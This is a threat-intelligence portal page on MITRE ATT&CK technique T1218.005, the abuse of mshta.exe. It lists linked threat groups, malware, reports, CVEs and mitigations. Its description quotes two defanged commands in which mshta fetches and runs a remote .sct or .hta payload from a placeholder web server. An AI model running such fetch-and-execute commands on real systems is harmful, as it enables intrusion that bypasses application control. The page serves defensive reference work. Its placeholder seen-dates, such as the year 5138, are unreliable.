T1218.005: T1218.005

Search IOCs, vulnerabilities, APT…

216.73.216.233

← Back to attack patterns

View on MITRE ATT&CK The MITRE Corporation · Published 23/01/2020 20:32 · Modified 04/06/2026 11:08

Essential information

MITRE technique ID: T1218.005
Confidence: 100/100
Revoked: No
Published: 23/01/2020 20:32
Modified: 04/06/2026 11:08
Author / Source: The MITRE Corporation

Aliases

Mshta

Platforms

windows

Description

Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017) Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications) Files may be executed by mshta.exe through an inline script: `mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))` They may also be executed directly from URLs: `mshta http[:]//webserver/payload[.]hta` Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)

Kill chain phases

Kill chain	Phase
mitre-attack	defense-evasion

Marking (TLP)

External references

Red Canary HTA Abuse Part Deux
mitre-attack (T1218.005)
Wikipedia HTML Application
Cylance Dust Storm
FireEye FIN7 April 2017
FireEye Attacks Leveraging HTA
Airbus Security Kovter Analysis
LOLBAS Mshta
MSDN HTML Applications

Related entities

Intrusion sets, malware, reports, vulnerabilities, indicators and other entities linked to this technique.

Intrusion sets (APT) (34)

APT-C-36 (Blind Eagle) uses

AlienVault Confidence 100

First seen 01/01/1970 · Last seen 16/11/5138 ·
DarkPeony uses

AlienVault Confidence 100

First seen 01/01/1970 · Last seen 16/11/5138 ·
MUSTANG PANDA uses BRONZE PRESIDENTSTATELY TAURUS

The MITRE Corporation Confidence 100

[Mustang Panda](https://attack.mitre.org/groups/G0129) is a China-based cyber espionage threat actor that has been conducting operations since at least 2012. [Mustang Panda](https://attack.mitre.org/groups/G0129) has been known to use tailored phishing lures…

First seen 01/01/1970 · Last seen 16/11/5138 ·
Confucius uses Confucius APT

The MITRE Corporation Confidence 100

[Confucius](https://attack.mitre.org/groups/G0142) is a cyber espionage group that has primarily targeted military personnel, high-profile personalities, business persons, and government organizations in South Asia since at least 2013. Security researchers…

First seen 01/01/1970 · Last seen 16/11/5138 ·
Lumma Stealer uses

AlienVault Confidence 100

First seen 01/01/1970 · Last seen 16/11/5138 ·
STARDUST CHOLLIMA uses NICKEL GLADSTONEBeagleBoyz

The MITRE Corporation Confidence 100

[APT38](https://attack.mitre.org/groups/G0082) is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau.(Citation: CISA AA20-239A BeagleBoyz August 2020)…

First seen 01/01/1970 · Last seen 16/11/5138 ·
FIN7 uses GOLD NIAGARAITG14

The MITRE Corporation Confidence 100

[FIN7](https://attack.mitre.org/groups/G0046) is a financially-motivated threat group that has been active since 2013. [FIN7](https://attack.mitre.org/groups/G0046) has targeted the retail, restaurant, hospitality, software, consulting, financial services, medical equipment, cloud services, media,…

First seen 01/01/1970 · Last seen 16/11/5138 ·
APT37 uses InkySquidGroup123

The MITRE Corporation Confidence 100

[APT37](https://attack.mitre.org/groups/G0067) is a North Korean state-sponsored cyber espionage group that has been active since at least 2012. The group has targeted victims primarily in South Korea, but also…

First seen 01/01/1970 · Last seen 16/11/5138 ·
SideCopy uses

The MITRE Corporation Confidence 100

[SideCopy](https://attack.mitre.org/groups/G1008) is a Pakistani threat group that has primarily targeted South Asian countries, including Indian and Afghani government personnel, since at least 2019. [SideCopy](https://attack.mitre.org/groups/G1008)'s name comes from its…

First seen 01/01/1970 · Last seen 16/11/5138 ·
Braodo uses

AlienVault Confidence 100

First seen 01/01/1970 · Last seen 16/11/5138 ·
CozyDuke uses IRON RITUALIRON HEMLOCK

The MITRE Corporation Confidence 100

[APT29](https://attack.mitre.org/groups/G0016) is threat group that has been attributed to Russia's Foreign Intelligence Service (SVR).(Citation: White House Imposing Costs RU Gov April 2021)(Citation: UK Gov Malign RIS Activity April…

First seen 01/01/1970 · Last seen 16/11/5138 ·
TA2541 uses

The MITRE Corporation Confidence 100

[TA2541](https://attack.mitre.org/groups/G1018) is a cybercriminal group that has been targeting the aviation, aerospace, transportation, manufacturing, and defense industries since at least 2017. [TA2541](https://attack.mitre.org/groups/G1018) campaigns are typically high volume and…

First seen 01/01/1970 · Last seen 16/11/5138 ·

← Previous

Page / 3

13–24 of 34

Emmenhtal uses

Family
CryptBot uses

Family
QuackBot uses

Family
Eliza RAT uses
ValleyRAT uses

Family
Revenge RAT uses
AsyncRAT uses

Family
LummaC2 uses

Family
Oblique RAT uses
DesckVB RAT uses

Family
GRAYRABBIT uses

Family
KimJongRAT uses

Family

← Previous

Page / 6

1–12 of 65

KimJongRAT Continues to Evolve by Leveraging LOTS related

AlienVault Confidence 100 20 MITREs 2 Malwares 11 IOCs 7 Observables 1 APT
An unknown actor distributes malicious VBS scripts via … related

AlienVault Confidence 100 19 MITREs 3 Malwares 12 IOCs 9 Observables
Okendo Reviews Supply Chain Attack related

AlienVault Confidence 100 18 MITREs 5 Malwares 3 IOCs 3 Observables 1 APT
Potemkin Loader & RMMProject The Anatomy of a … related

AlienVault Confidence 100 19 MITREs 4 Malwares 22 IOCs 22 Observables
Inside DesckVB Rat Analysis: From Malspam to In-Memory … related

AlienVault Confidence 100 21 MITREs 2 Malwares 15 IOCs 15 Observables
Threat landscape — insurance related

Confidence 100 199 MITREs 11 APTs
ClickFix Gets Creative: Malware Buried in Images related

10 MITREs 2 Malwares 12 Observables
EVALUSION Campaign Delivers Amatera Stealer and NetSupport... related

16 MITREs 3 Malwares 1 Observable 1 APT
Malware or LLM? Silent Werewolf employs new loaders … related

15 MITREs 1 Malware 28 Observables 1 APT
Fileless Execution: PowerShell Based Shellcode Loader Executes Remcos … related

11 MITREs 1 Malware 5 Observables
Phishing campaign impersonates Booking.com, delivers a suite of … related

7 MITREs 6 Malwares 1 APT
Analysis: SmokeLoader malware distribution related

6 MITREs 4 Malwares

← Previous

Page / 3

1–12 of 25

Vulnerabilities (CVE) (12)

CVE-2021-44228 KEV targets

10.0 Critical

Apache Log4j2 contains a vulnerability where JNDI features do not protect against attacker-controlled JNDI-related endpoints, allowing for remote code execution.

Attack vector: Network
Published: 10/12/2021
Modified: 27/05/2026

CVE-2023-22518 KEV targets

9.8 Critical

Atlassian Confluence Data Center and Server contain an improper authorization vulnerability that can result in significant data loss when exploited by an …

Attack vector: Network
Published: 07/11/2023
Modified: 21/12/2025

CVE-2017-17562 KEV targets

8.1 High

Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked.

Attack vector: NETWORK
Complexity: HIGH
Published: 12/12/2017
Modified: 22/04/2026

CVE-2017-9805 KEV targets

8.1 High

Apache Struts REST Plugin uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to …

Attack vector: NETWORK
Complexity: HIGH
Published: 15/09/2017
Modified: 22/04/2026

CWE-502

CVE-2025-59287 KEV targets

9.8 Critical

Microsoft Windows Server Update Service (WSUS) contains a deserialization of untrusted data vulnerability that allows for remote code execution.

Attack vector: Network
Published: 24/10/2025
Modified: 21/12/2025

Undergoing Analysis

CVE-2023-22527 KEV targets

9.8 Critical

Atlassian Confluence Data Center and Server contain an unauthenticated OGNL template injection vulnerability that can lead to remote code execution.

Attack vector: Network
Published: 24/01/2024
Modified: 21/12/2025

CVE-2020-16040 targets

6.5 Medium

Insufficient data validation in V8 in Google Chrome prior to 87.0.4280.88 allowed a remote attacker to potentially exploit heap corruption via a …

Attack vector: NETWORK
Published: 08/01/2021
Modified: 27/01/2026

CVE-2023-22515 KEV targets

9.8 Critical

Atlassian Confluence Data Center and Server contains a broken access control vulnerability that allows an attacker to create unauthorized Confluence administrator accounts …

Attack vector: Network
Published: 05/10/2023
Modified: 21/12/2025

CVE-2025-20265 targets

10.0 Critical

A vulnerability in the RADIUS subsystem implementation of Cisco Secure Firewall Management Center (FMC) Software could allow an unauthenticated, remote attacker to …

Attack vector: Network
Published: 14/08/2025
Modified: 27/05/2026

Awaiting Analysis

CVE-2022-26134 KEV targets

Atlassian Confluence Server and Data Center contain a remote code execution vulnerability that allows for an unauthenticated attacker to perform remote code …

Published: 02/06/2022
Modified: 27/05/2026

CVE-2025-7775 KEV targets

9.2 Critical

Memory overflow vulnerability leading to Remote Code Execution and/or Denial of Service in NetScaler ADC and NetScaler Gateway when NetScaler is configured …

Attack vector: Network
Published: 26/08/2025
Modified: 27/05/2026

Analyzed

CVE-2017-0199 KEV targets

7.8 High

Microsoft Office and WordPad contain an unspecified vulnerability due to the way the applications parse specially crafted files. Successful exploitation allows for …

Attack vector: LOCAL
Complexity: LOW
Published: 12/04/2017
Modified: 22/04/2026

Attack patterns (MITRE) (1)

T1218 subtechnique-of

System Binary Proxy Execution MITRE

Campaign (2)

C0015 uses
Operation Dust Storm uses

Tool (2)

Covenant uses

The MITRE Corporation Confidence 100

[Covenant](https://attack.mitre.org/software/S1155) is a multi-platform command and control framework written in .NET. While designed for penetration testing and security research, the tool has also been used by threat actors…
Koadic uses

The MITRE Corporation Confidence 100

[Koadic](https://attack.mitre.org/software/S0250) is a Windows post-exploitation framework and penetration testing tool that is publicly available on GitHub. [Koadic](https://attack.mitre.org/software/S0250) has several options for staging payloads and creating implants, and performs…

Course Of Action (2)

Disable or Remove Feature or Program mitigates
Execution Prevention mitigates

Contact About Legal notice Privacy policy Terms of use